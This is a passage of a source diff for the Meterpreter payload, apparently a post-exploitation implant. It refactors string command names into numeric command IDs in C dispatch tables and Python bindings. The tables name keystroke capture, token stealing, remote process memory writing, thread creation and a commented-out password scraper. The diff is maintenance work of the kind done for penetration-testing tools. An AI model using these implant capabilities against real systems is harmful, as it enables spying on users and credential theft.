     return False
@@ -59,10 +60,10 @@ def add_user(server, username, password):
   return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
 
 def add_group_user(server, group, username):
-  return __add_group_user_internal('incognito_add_group_user', server, group, username)
+  return __add_group_user_internal(COMMAND_ID_INCOGNITO_ADD_GROUP_USER, server, group, username)
 
 def add_localgroup_user(server, group, username):
-  return __add_group_user_internal('incognito_add_localgroup_user', server, group, username)
+  return __add_group_user_internal(COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER, server, group, username)
 
 def __add_group_user_internal(msg, server, group, username):
   tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)

c/meterpreter/source/extensions/python/Lib/meterpreter/kiwi.py

@@ -3,6 +3,7 @@ import meterpreter.user
 
 from meterpreter.core import *
 from meterpreter.tlv import *
+from meterpreter.command import *
 
 # OJ - 7th May 2018
 # This function was broken when we rejigged kiwi to work off the Mimikatz subrepo. Commenting this stuff
@@ -12,7 +13,7 @@ from meterpreter.tlv import *
 #    raise Exception('Unable to extract credentials: Not running as SYSTEM')
 #
 #  tlv = tlv_pack(TLV_TYPE_KIWI_PWD_ID, 0)
-#  resp = invoke_meterpreter('kiwi_scrape_passwords', True, tlv)
+#  resp = invoke_meterpreter(COMMAND_ID_KIWI_SCRAPE_PASSWORDS, True, tlv)
 #  if resp == None:
 #    return False
 #

c/meterpreter/source/extensions/python/Lib/meterpreter/sys.py

@@ -2,9 +2,10 @@ import meterpreter_bindings
 
 from meterpreter.core import *
 from meterpreter.tlv import *
+from meterpreter.command import *
 
 def info():
-  resp = invoke_meterpreter('stdapi_sys_config_sysinfo', True)
+  resp = invoke_meterpreter(COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO, True)
   if resp == None:
     return False
 
@@ -18,7 +19,7 @@ def info():
   }
 
 def ps_list():
-  resp = invoke_meterpreter('stdapi_sys_process_get_processes', True)
+  resp = invoke_meterpreter(COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES, True)
   if resp == None:
       return False
 

c/meterpreter/source/extensions/python/Lib/meterpreter/tlv.py

@@ -1,9 +1,10 @@
 from meterpreter.core import *
 
-TLV_STDAPI_EXTENSION     = 0
+TLV_STDAPI_EXTENSION    = 0
-TLV_INCOGNITO_EXTENSION  = 20000
+TLV_INCOGNITO_EXTENSION = 20000
-TLV_PRIV_EXTENSION       = 20000
+TLV_PRIV_EXTENSION      = 20000
-TLV_KIWI_EXTENSION       = 20000
+TLV_KIWI_EXTENSION      = 20000
+TLV_EXTAPI_EXTENSION    = 20000
 
 # Stdapi constants
 TLV_TYPE_COMPUTER_NAME         = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1040)
@@ -57,3 +58,21 @@ TLV_TYPE_INCOGNITO_PASSWORD                    = TLV_META_TYPE_STRING  | (TLV_IN
 TLV_TYPE_INCOGNITO_SERVERNAME                  = TLV_META_TYPE_STRING  | (TLV_INCOGNITO_EXTENSION + 9)
 TLV_TYPE_INCOGNITO_GROUPNAME                   = TLV_META_TYPE_STRING  | (TLV_INCOGNITO_EXTENSION + 10)
 
+TLV_TYPE_EXTAPI_ADSI_DOMAIN       = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 54)
+TLV_TYPE_EXTAPI_ADSI_FILTER       = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 55)
+TLV_TYPE_EXTAPI_ADSI_FIELD        = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 56)
+TLV_TYPE_EXTAPI_ADSI_RESULT       = TLV_META_TYPE_GROUP   | (TLV_EXTAPI_EXTENSION + 57)
+TLV_TYPE_EXTAPI_ADSI_MAXRESULTS   = TLV_META_TYPE_UINT    | (TLV_EXTAPI_EXTENSION + 58)
+TLV_TYPE_EXTAPI_ADSI_PAGESIZE     = TLV_META_TYPE_UINT    | (TLV_EXTAPI_EXTENSION + 59)
+TLV_TYPE_EXTAPI_ADSI_ARRAY        = TLV_META_TYPE_GROUP   | (TLV_EXTAPI_EXTENSION + 60)
+TLV_TYPE_EXTAPI_ADSI_STRING       = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 61)
+TLV_TYPE_EXTAPI_ADSI_NUMBER       = TLV_META_TYPE_UINT    | (TLV_EXTAPI_EXTENSION + 62)
+TLV_TYPE_EXTAPI_ADSI_BIGNUMBER    = TLV_META_TYPE_QWORD   | (TLV_EXTAPI_EXTENSION + 63)
+TLV_TYPE_EXTAPI_ADSI_BOOL         = TLV_META_TYPE_BOOL    | (TLV_EXTAPI_EXTENSION + 64)
+TLV_TYPE_EXTAPI_ADSI_RAW          = TLV_META_TYPE_RAW     | (TLV_EXTAPI_EXTENSION + 65)
+TLV_TYPE_EXTAPI_ADSI_PATH         = TLV_META_TYPE_GROUP   | (TLV_EXTAPI_EXTENSION + 66)
+TLV_TYPE_EXTAPI_ADSI_PATH_VOL     = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 67)
+TLV_TYPE_EXTAPI_ADSI_PATH_PATH    = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 68)
+TLV_TYPE_EXTAPI_ADSI_PATH_TYPE    = TLV_META_TYPE_UINT    | (TLV_EXTAPI_EXTENSION + 69)
+TLV_TYPE_EXTAPI_ADSI_DN           = TLV_META_TYPE_GROUP   | (TLV_EXTAPI_EXTENSION + 70)
+

c/meterpreter/source/extensions/python/Lib/meterpreter/transport.py

@@ -3,9 +3,10 @@ import datetime
 
 from meterpreter.core import *
 from meterpreter.tlv import *
+from meterpreter.command import *
 
 def list():
-  resp = invoke_meterpreter('core_transport_list', True)
+  resp = invoke_meterpreter(COMMAND_ID_CORE_TRANSPORT_LIST, True)
   if resp == None:
       return []
 
@@ -59,7 +60,7 @@ def add(url, session_expiry=None, comm_timeout=None, retry_total=None,
   if cert_hash:
     tlv += tlv_pack(TLV_TYPE_TRANS_CERT_HASH, cert_hash)
 
-  resp = invoke_meterpreter('core_transport_add', True, tlv)
+  resp = invoke_meterpreter(COMMAND_ID_CORE_TRANSPORT_ADD, True, tlv)
   if resp == None:
     return False
 

c/meterpreter/source/extensions/python/Lib/meterpreter/user.py

@@ -2,18 +2,19 @@ import meterpreter_bindings
 
 from meterpreter.core import *
 from meterpreter.tlv import *
+from meterpreter.command import *
 
 SYSTEM_SID = "S-1-5-18"
 
 def getuid():
-  resp = invoke_meterpreter('stdapi_sys_config_getuid', True)
+  resp = invoke_meterpreter(COMMAND_ID_STDAPI_SYS_CONFIG_GETUID, True)
   if resp == None:
     return False
 
   return packet_get_tlv(resp, TLV_TYPE_USER_NAME)['value']
 
 def getsid():
-  resp = invoke_meterpreter('stdapi_sys_config_getsid', True)
+  resp = invoke_meterpreter(COMMAND_ID_STDAPI_SYS_CONFIG_GETSID, True)
   if resp == None:
     return False
 

c/meterpreter/source/extensions/python/python_main.c

@@ -23,8 +23,8 @@ Remote* gRemote = NULL;
 /*! @brief List of commands that the extended API extension providers. */
 Command customCommands[] =
 {
-	COMMAND_REQ("python_reset", request_python_reset),
+	COMMAND_REQ(COMMAND_ID_PYTHON_RESET, request_python_reset),
-	COMMAND_REQ("python_execute", request_python_execute),
+	COMMAND_REQ(COMMAND_ID_PYTHON_EXECUTE, request_python_execute),
 	COMMAND_TERMINATOR
 };
 
@@ -55,11 +55,11 @@ BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
 
 /*!
  * @brief Callback for when a command has been added to the meterpreter instance.
- * @param commandName The name of the command that has been added.
+ * @param commandId The ID of the command that has been added.
  */
-VOID __declspec(dllexport) CommandAdded(const char* commandName)
+VOID __declspec(dllexport) CommandAdded(UINT commandId)
 {
-	binding_add_command(commandName);
+	binding_add_command(commandId);
 }
 
 /*!

c/meterpreter/source/extensions/python/python_meterpreter_binding.c

@@ -46,9 +46,19 @@ static PyObject* binding_invoke(PyObject* self, PyObject* args)
 	return result;
 }
 
-VOID binding_insert_command(const char* commandName)
+VOID binding_insert_command(UINT commandId)
 {
 	static PyMethodDef def;
+	char commandName[256] = { 0 };
+	if (commandId == 0)
+	{
+		strncpy_s(commandName, sizeof(commandName), "meterpreter_core", sizeof(commandName) - 1);
+	}
+	else
+	{
+		sprintf_s(commandName, sizeof(commandName), "command_%u", commandId);
+	}
+
 	dprintf("[PYTHON] inserting command %s", commandName);
 	def.ml_name = commandName;
 	def.ml_meth = binding_invoke;
@@ -67,15 +77,19 @@ VOID binding_startup()
 	}
 }
 
-VOID binding_add_command(const char* commandName)
+VOID binding_add_command(UINT commandId)
 {
-	dprintf("[PYTHON] Adding command %s", (char*)commandName);
+	dprintf("[PYTHON] Adding command %u", commandId);
 
-	// only add non-core commands
+	// We know that core commands are within the first thousand. So we can ignore anything that isn't
-	if (_strnicmp("core_", commandName, 5) != 0)
+	// big enough here to skip out on all the core commands. It's a cheat, but it works. And we cheat
+	// everywhere anyway!
+
+	// Only add non-core commands
+	if (commandId >= 1000)
 	{
-		met_api->list.add(gBoundCommandList, (char*)commandName);
+		met_api->list.add(gBoundCommandList, (LPVOID)commandId);
-		binding_insert_command(commandName);
+		binding_insert_command(commandId);
 	}
 }
 
@@ -89,9 +103,9 @@ VOID binding_init()
 	// mechanisms for extension loading. Without this, we'd have to manually wire in each of the
 	// base commands, which doesn't make sense. Instead we can match against core command names
 	// and funnel through this binding knowing that they'll be there regardless of the wiring.
-	binding_insert_command("meterpreter_core");
+	binding_insert_command(0);
 	for (PNODE node = gBoundCommandList->start; node != NULL; node = node->next)
 	{
-		binding_insert_command((const char*)node->data);
+		binding_insert_command((UINT)node->data);
 	}
 }

c/meterpreter/source/extensions/python/python_meterpreter_binding.h

@@ -3,6 +3,11 @@
  * @brief Declrations for functions that support meterpreter bindings.
  */
 
+#ifndef PYTHON_METERPRETER_BINDING_H
+#define PYTHON_METERPRETER_BINDING_H
+
 VOID binding_startup();
-VOID binding_add_command();
+VOID binding_add_command(UINT commandId);
-VOID binding_init();
+VOID binding_init();
+
+#endif

c/meterpreter/source/extensions/stdapi/server/net/socket/tcp_server.c

@@ -246,7 +246,7 @@ DWORD tcp_channel_server_notify(Remote * remote, TcpServerContext * serverCtx)
 
 		dprintf("[TCP-SERVER] tcp_channel_server_notify. New connection %s:%d <- %s:%d", localhost, localport, peerhost, peerport);
 
-		request = met_api->packet.create(PACKET_TLV_TYPE_REQUEST, "tcp_channel_open");
+		request = met_api->packet.create(PACKET_TLV_TYPE_REQUEST, COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN);
 		if (!request)
 		{
 			BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. met_api->packet.create failed", ERROR_INVALID_HANDLE);

c/meterpreter/source/extensions/stdapi/server/stdapi.c

@@ -18,152 +18,151 @@ extern DWORD request_general_channel_open(Remote *remote, Packet *packet);
 Command customCommands[] =
 {
 	// General
-	COMMAND_REQ("core_channel_open", request_general_channel_open),
+	COMMAND_REQ(COMMAND_ID_CORE_CHANNEL_OPEN, request_general_channel_open),
 
 	// Railgun
-	COMMAND_REQ("stdapi_railgun_api", request_railgun_api),
+	COMMAND_REQ(COMMAND_ID_STDAPI_RAILGUN_API, request_railgun_api),
-	COMMAND_REQ("stdapi_railgun_api_multi", request_railgun_api_multi),
+	COMMAND_REQ(COMMAND_ID_STDAPI_RAILGUN_API_MULTI, request_railgun_api_multi),
-	COMMAND_REQ("stdapi_railgun_memread", request_railgun_memread),
+	COMMAND_REQ(COMMAND_ID_STDAPI_RAILGUN_MEMREAD, request_railgun_memread),
-	COMMAND_REQ("stdapi_railgun_memwrite", request_railgun_memwrite),
+	COMMAND_REQ(COMMAND_ID_STDAPI_RAILGUN_MEMWRITE, request_railgun_memwrite),
 
 	// Fs
-	COMMAND_REQ("stdapi_fs_ls", request_fs_ls),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_LS, request_fs_ls),
-	COMMAND_REQ("stdapi_fs_getwd", request_fs_getwd),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_GETWD, request_fs_getwd),
-	COMMAND_REQ("stdapi_fs_chdir", request_fs_chdir),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_CHDIR, request_fs_chdir),
-	COMMAND_REQ("stdapi_fs_mkdir", request_fs_mkdir),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_MKDIR, request_fs_mkdir),
-	COMMAND_REQ("stdapi_fs_delete_dir", request_fs_delete_dir),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_DELETE_DIR, request_fs_delete_dir),
-	COMMAND_REQ("stdapi_fs_delete_file", request_fs_delete_file),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_DELETE_FILE, request_fs_delete_file),
-	COMMAND_REQ("stdapi_fs_separator", request_fs_separator),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_SEPARATOR, request_fs_separator),
-	COMMAND_REQ("stdapi_fs_stat", request_fs_stat),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_STAT, request_fs_stat),
-	COMMAND_REQ("stdapi_fs_file_expand_path", request_fs_file_expand_path),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH, request_fs_file_expand_path),
-	COMMAND_REQ("stdapi_fs_file_move", request_fs_file_move),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_FILE_MOVE, request_fs_file_move),
-	COMMAND_REQ("stdapi_fs_file_copy", request_fs_file_copy),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_FILE_COPY, request_fs_file_copy),
-	COMMAND_REQ("stdapi_fs_md5", request_fs_md5),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_MD5, request_fs_md5),
-	COMMAND_REQ("stdapi_fs_sha1", request_fs_sha1),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_SHA1, request_fs_sha1),
-	COMMAND_REQ("stdapi_fs_search", request_fs_search),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_SEARCH, request_fs_search),
-	COMMAND_REQ("stdapi_fs_mount_show", request_fs_mount_show),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_MOUNT_SHOW, request_fs_mount_show),
 
 	// Process
-	COMMAND_REQ("stdapi_sys_process_attach", request_sys_process_attach),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH, request_sys_process_attach),
-	COMMAND_REQ("stdapi_sys_process_close", request_sys_process_close),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE, request_sys_process_close),
-	COMMAND_REQ("stdapi_sys_process_execute", request_sys_process_execute),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE, request_sys_process_execute),
-	COMMAND_REQ("stdapi_sys_process_kill", request_sys_process_kill),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_KILL, request_sys_process_kill),
-	COMMAND_REQ("stdapi_sys_process_get_processes", request_sys_process_get_processes),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES, request_sys_process_get_processes),
-	COMMAND_REQ("stdapi_sys_process_getpid", request_sys_process_getpid),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_GETPID, request_sys_process_getpid),
-	COMMAND_REQ("stdapi_sys_process_get_info", request_sys_process_get_info),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO, request_sys_process_get_info),
-	COMMAND_REQ("stdapi_sys_process_wait", request_sys_process_wait),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_WAIT, request_sys_process_wait),
 
 	// Image
-	COMMAND_REQ("stdapi_sys_process_image_load", request_sys_process_image_load),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD, request_sys_process_image_load),
-	COMMAND_REQ("stdapi_sys_process_image_get_proc_address", request_sys_process_image_get_proc_address),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS, request_sys_process_image_get_proc_address),
-	COMMAND_REQ("stdapi_sys_process_image_unload", request_sys_process_image_unload),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD, request_sys_process_image_unload),
-	COMMAND_REQ("stdapi_sys_process_image_get_images", request_sys_process_image_get_images),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES, request_sys_process_image_get_images),
 
 	// Memory
-	COMMAND_REQ("stdapi_sys_process_memory_allocate", request_sys_process_memory_allocate),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE, request_sys_process_memory_allocate),
-	COMMAND_REQ("stdapi_sys_process_memory_free", request_sys_process_memory_free),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE, request_sys_process_memory_free),
-	COMMAND_REQ("stdapi_sys_process_memory_read", request_sys_process_memory_read),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ, request_sys_process_memory_read),
-	COMMAND_REQ("stdapi_sys_process_memory_write", request_sys_process_memory_write),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE, request_sys_process_memory_write),
-	COMMAND_REQ("stdapi_sys_process_memory_query", request_sys_process_memory_query),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY, request_sys_process_memory_query),
-	COMMAND_REQ("stdapi_sys_process_memory_protect", request_sys_process_memory_protect),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT, request_sys_process_memory_protect),
-	COMMAND_REQ("stdapi_sys_process_memory_lock", request_sys_process_memory_lock),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK, request_sys_process_memory_lock),
-	COMMAND_REQ("stdapi_sys_process_memory_unlock", request_sys_process_memory_unlock),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK, request_sys_process_memory_unlock),
 
 	// Thread
-	COMMAND_REQ("stdapi_sys_process_thread_open", request_sys_process_thread_open),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN, request_sys_process_thread_open),
-	COMMAND_REQ("stdapi_sys_process_thread_create", request_sys_process_thread_create),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE, request_sys_process_thread_create),
-	COMMAND_REQ("stdapi_sys_process_thread_close", request_sys_process_thread_close),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE, request_sys_process_thread_close),
-	COMMAND_REQ("stdapi_sys_process_thread_get_threads", request_sys_process_thread_get_threads),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS, request_sys_process_thread_get_threads),
-	COMMAND_REQ("stdapi_sys_process_thread_suspend", request_sys_process_thread_suspend),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND, request_sys_process_thread_suspend),
-	COMMAND_REQ("stdapi_sys_process_thread_resume", request_sys_process_thread_resume),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME, request_sys_process_thread_resume),
-	COMMAND_REQ("stdapi_sys_process_thread_terminate", request_sys_process_thread_terminate),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE, request_sys_process_thread_terminate),
-	COMMAND_REQ("stdapi_sys_process_thread_query_regs", request_sys_process_thread_query_regs),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS, request_sys_process_thread_query_regs),
-	COMMAND_REQ("stdapi_sys_process_thread_set_regs", request_sys_process_thread_set_regs),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS, request_sys_process_thread_set_regs),
 
 	// Registry
-	COMMAND_REQ("stdapi_registry_check_key_exists", request_registry_check_key_exists),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS, request_registry_check_key_exists),
-	COMMAND_REQ("stdapi_registry_load_key", request_registry_load_key),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY, request_registry_load_key),
-	COMMAND_REQ("stdapi_registry_unload_key", request_registry_unload_key),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY, request_registry_unload_key),
-	COMMAND_REQ("stdapi_registry_open_key", request_registry_open_key),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY, request_registry_open_key),
-	COMMAND_REQ("stdapi_registry_open_remote_key", request_registry_open_remote_key),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY, request_registry_open_remote_key),
-	COMMAND_REQ("stdapi_registry_create_key", request_registry_create_key),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY, request_registry_create_key),
-	COMMAND_REQ("stdapi_registry_enum_key", request_registry_enum_key),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY, request_registry_enum_key),
-	COMMAND_REQ("stdapi_registry_delete_key", request_registry_delete_key),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY, request_registry_delete_key),
-	COMMAND_REQ("stdapi_registry_close_key", request_registry_close_key),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY, request_registry_close_key),
-	COMMAND_REQ("stdapi_registry_set_value", request_registry_set_value),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_SET_VALUE, request_registry_set_value),
-	COMMAND_REQ("stdapi_registry_query_value", request_registry_query_value),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE, request_registry_query_value),
-	COMMAND_REQ("stdapi_registry_query_class", request_registry_query_class),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS, request_registry_query_class),
-	COMMAND_REQ("stdapi_registry_enum_value", request_registry_enum_value),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE, request_registry_enum_value),
-	COMMAND_REQ("stdapi_registry_delete_value", request_registry_delete_value),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE, request_registry_delete_value),
-	COMMAND_REQ("stdapi_registry_enum_key_direct", request_registry_enum_key_direct),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT, request_registry_enum_key_direct),
-	COMMAND_REQ("stdapi_registry_enum_value_direct", request_registry_enum_value_direct),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT, request_registry_enum_value_direct),
-	COMMAND_REQ("stdapi_registry_query_value_direct", request_registry_query_value_direct),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT, request_registry_query_value_direct),
-	COMMAND_REQ("stdapi_registry_set_value_direct", request_registry_set_value_direct),
+	COMMAND_REQ(COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT, request_registry_set_value_direct),
 
 	// Sys/config
-	COMMAND_REQ("stdapi_sys_config_getuid", request_sys_config_getuid),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_GETUID, request_sys_config_getuid),
-	COMMAND_REQ("stdapi_sys_config_localtime", request_sys_config_localtime),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME, request_sys_config_localtime),
-	COMMAND_REQ("stdapi_sys_config_sysinfo", request_sys_config_sysinfo),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO, request_sys_config_sysinfo),
-	COMMAND_REQ("stdapi_sys_config_rev2self", request_sys_config_rev2self),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF, request_sys_config_rev2self),
-	COMMAND_REQ("stdapi_sys_config_getprivs", request_sys_config_getprivs),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS, request_sys_config_getprivs),
-	COMMAND_REQ("stdapi_sys_config_getenv", request_sys_config_getenv),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_GETENV, request_sys_config_getenv),
-	COMMAND_REQ("stdapi_sys_config_driver_list", request_sys_config_driver_list),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST, request_sys_config_driver_list),
-	COMMAND_REQ("stdapi_sys_config_steal_token", request_sys_config_steal_token),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN, request_sys_config_steal_token),
-	COMMAND_REQ("stdapi_sys_config_drop_token", request_sys_config_drop_token),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN, request_sys_config_drop_token),
-	COMMAND_REQ("stdapi_sys_config_getsid", request_sys_config_getsid),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_GETSID, request_sys_config_getsid),
 
 	// Net
-	COMMAND_REQ("stdapi_net_config_get_routes", request_net_config_get_routes),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES, request_net_config_get_routes),
-	COMMAND_REQ("stdapi_net_config_add_route", request_net_config_add_route),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE, request_net_config_add_route),
-	COMMAND_REQ("stdapi_net_config_remove_route", request_net_config_remove_route),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE, request_net_config_remove_route),
-	COMMAND_REQ("stdapi_net_config_get_interfaces", request_net_config_get_interfaces),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES, request_net_config_get_interfaces),
-	COMMAND_REQ("stdapi_net_config_get_arp_table", request_net_config_get_arp_table),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE, request_net_config_get_arp_table),
-	COMMAND_REQ("stdapi_net_config_get_netstat", request_net_config_get_netstat),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT, request_net_config_get_netstat),
 
 	// Proxy
-	COMMAND_REQ("stdapi_net_config_get_proxy", request_net_config_get_proxy_config),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY, request_net_config_get_proxy_config),
 	// Resolve
-	COMMAND_REQ("stdapi_net_resolve_host", request_resolve_host),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_RESOLVE_HOST, request_resolve_host),
-	COMMAND_REQ("stdapi_net_resolve_hosts", request_resolve_hosts),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS, request_resolve_hosts),
 
 	// Socket
-	COMMAND_REQ("stdapi_net_socket_tcp_shutdown", request_net_socket_tcp_shutdown),
+	COMMAND_REQ(COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN, request_net_socket_tcp_shutdown),
 
 	// UI
-	COMMAND_REQ("stdapi_ui_enable_mouse", request_ui_enable_mouse),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_ENABLE_MOUSE, request_ui_enable_mouse),
-	COMMAND_REQ("stdapi_ui_enable_keyboard", request_ui_enable_keyboard),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD, request_ui_enable_keyboard),
-	COMMAND_REQ("stdapi_ui_get_idle_time", request_ui_get_idle_time),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_GET_IDLE_TIME, request_ui_get_idle_time),
-	COMMAND_REQ("stdapi_ui_start_keyscan", request_ui_start_keyscan),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_START_KEYSCAN, request_ui_start_keyscan),
-	COMMAND_REQ("stdapi_ui_stop_keyscan", request_ui_stop_keyscan),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_STOP_KEYSCAN, request_ui_stop_keyscan),
-	COMMAND_REQ("stdapi_ui_get_keys", request_ui_get_keys),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8, request_ui_get_keys_utf8),
-	COMMAND_REQ("stdapi_ui_get_keys_utf8", request_ui_get_keys_utf8),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_DESKTOP_ENUM, request_ui_desktop_enum),
-	COMMAND_REQ("stdapi_ui_desktop_enum", request_ui_desktop_enum),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_DESKTOP_GET, request_ui_desktop_get),
-	COMMAND_REQ("stdapi_ui_desktop_get", request_ui_desktop_get),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_DESKTOP_SET, request_ui_desktop_set),
-	COMMAND_REQ("stdapi_ui_desktop_set", request_ui_desktop_set),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT, request_ui_desktop_screenshot),
-	COMMAND_REQ("stdapi_ui_desktop_screenshot", request_ui_desktop_screenshot),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_SEND_KEYS, request_ui_send_keys),
-	COMMAND_REQ("stdapi_ui_send_keys", request_ui_send_keys),
